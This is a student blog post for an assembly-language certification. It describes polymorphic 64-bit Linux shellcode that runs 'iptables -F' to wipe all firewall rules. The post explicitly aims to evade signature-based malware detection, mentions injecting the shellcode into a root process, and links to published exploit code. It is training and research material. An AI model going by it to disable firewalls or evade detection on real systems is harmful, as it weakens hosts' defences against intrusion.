PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification."
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE64-1434

Target Operating System: 64 bit Linux (x86_64 GNU/Linux)

This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html

The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php

Original size: 50 bytes (don't believe what he says :)

My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm
Published: https://www.exploit-db.com/exploits/41503/

My version:
Number of bytes = 47
Number of nulls = 0

PolyFlushIPTables1434.nasm

 Intro

This shellcode basically just executes /sbin/iptables -F without any other parameters.

man iptables
"-F, --flush [chain]
              Flush  the  selected  chain (all the chains in the table if none is given).  This is equivalent to deleting all the rules one by one."

Polymorphic

Besides fixing some issues with the original shellcode which would have increased it's size, I rewrote the code to reduce its size down to 43 bytes. Then I worked on obscuring what is happening which increased the size back to 47 bytes.

 If you look up the system call value for 82:

 

This can be found in /usr/include/x86_64-linux-gnu/asm/unistd_64.h on my system.

82 is clearly not the correct system call value for execve. The bit of math on lines 41 and 42 are what converts the value in AL to be correct for the execve call.

Overall this produces bytecode that would generate a different signature, and defeat signature based detection.

Testing

Download:
wget https://raw.githubusercontent.com/rtaylor777/nasm/master/PolyFlushIPTables1434.nasm

Assuming you have the NASM assembler ( http://www.nasm.us/ ):
Assemble:
nasm -felf64  PolyFlushIPTables1434.nasm -o PolyFlushIPTables1434.o

Link:
ld PolyFlushIPTables1434.o -o PolyFlushIPTables1434

Execute:
./PolyFlushIPTables1434

The  PolyFlushIPTables1434 shellcode.c

If you missed it from my previous blog posts the shellcode.c file is auto generated by my helper scripts. See: http://a41l4.blogspot.ca/2017/02/slae-helper-scripts.html

Sample of running the resulting shellcode executable:

The Original

The Original Shellcode Original.c

You will notice that even though the original author claimed his shellcode was 49 bytes, he actually somehow missed an essential byte, push bx which would have pushed the 2nd half of his string onto the stack. So I resorted to copying his assembler source and building the shellcode from that.

When tested with my usual practice of polluting the registers with 0xffffffffffffffff before calling the shellcode his shellcode experienced a segmentation fault. This is due to the fact that the author failed to zero RDX which would have increased the size of his code again by a minimum of 1 more byte, resulting in an actual size of 51 bytes.

Summary

PolyFlushIPTables1434 shellcode runs /sbin/iptables -F which would wipe all iptables (firewall) rules from the host where it is executed. Of course you would have to run this as root so injecting it into a process that has root would be required. Additionally this version is polymorphic in that it is a bit more confusing to follow the code and it is very different bytecode than the original so it would not be in a signature database of a malware detection software. This version is also 3 to 4 bytes smaller than the original depending on whether you actually wish to fix the original code.

If you wish to learn more about assembly language, I highly recommend the "SecurityTube Linux Assembly Expert course and certification."

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/